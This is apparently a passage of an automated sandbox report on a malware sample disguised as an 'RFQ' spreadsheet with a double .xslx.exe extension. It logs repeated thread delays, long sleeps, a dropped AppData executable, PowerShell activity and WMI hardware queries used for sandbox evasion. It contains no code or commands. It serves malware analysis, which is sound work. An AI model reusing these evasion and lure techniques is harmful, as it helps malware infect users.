                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195547Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195438Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195313Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195188Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195063Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1194953Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1194844Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1194719Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1194609Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1194500Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1194391Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1194281Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1200000
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1199874
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1199764
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1199656
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1199546
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1199250
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1199125
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1199015
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198906
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198796
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198687
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198578
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198468
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198359
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198250
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198140
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198031
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197921
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197812
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197703
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197593
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197484
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197373
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197265
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197156
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197046
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196937
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196828
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196718
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196609
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196500
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196390
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196281
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196171
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196060
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195951
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195843
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195734
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195624
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195515
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195406
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195296
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195187
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195078
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1194954
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1194730
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1194598
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1194308
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1194202
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1194093
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1193982
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8249Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1391Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8012Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1532Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeWindow / User API: threadDelayed 3254Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeWindow / User API: threadDelayed 6595Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeWindow / User API: threadDelayed 7343
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeWindow / User API: threadDelayed 2516
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 5820Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6516Thread sleep count: 8249 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6656Thread sleep count: 1391 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3732Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6784Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep count: 32 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1200000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7460Thread sleep count: 3254 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1199891s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7460Thread sleep count: 6595 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1199766s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1199656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1199547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1199435s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1199328s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1199219s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1199109s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1199000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1198889s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1198781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1198672s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1198563s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1198453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1198344s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1198234s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1198125s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1198016s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1197906s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1197797s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1197688s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1197563s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1197438s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1197313s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1197203s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1197094s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1196969s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1196859s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1196681s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1196531s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1196422s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1196312s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1196203s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1196094s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1195984s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1195875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1195766s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1195656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1195547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1195438s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1195313s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1195188s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1195063s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1194953s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1194844s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1194719s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1194609s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1194500s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1194391s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe TID: 7436Thread sleep time: -1194281s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 1848Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep count: 34 > 30
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -31359464925306218s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1200000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7576Thread sleep count: 7343 > 30
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1199874s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7576Thread sleep count: 2516 > 30
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1199764s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1199656s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1199546s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1199250s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1199125s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1199015s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1198906s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1198796s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1198687s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1198578s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1198468s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1198359s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1198250s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1198140s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1198031s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1197921s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1197812s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1197703s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1197593s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1197484s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1197373s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1197265s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1197156s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1197046s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1196937s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1196828s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1196718s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1196609s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1196500s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1196390s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1196281s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1196171s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1196060s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1195951s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1195843s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1195734s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1195624s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1195515s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1195406s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1195296s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1195187s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1195078s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1194954s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1194730s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1194598s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1194308s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1194202s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1194093s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe TID: 7572Thread sleep time: -1193982s >= -30000s
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1200000Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199891Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199766Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199656Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199547Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199435Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199328Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199219Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199109Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1199000Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198889Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198781Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198672Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198563Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198453Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198344Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198234Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198125Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1198016Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197906Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197797Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197688Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197563Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197438Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197313Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197203Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1197094Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196969Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196859Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196681Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196531Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196422Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196312Jump to behavior
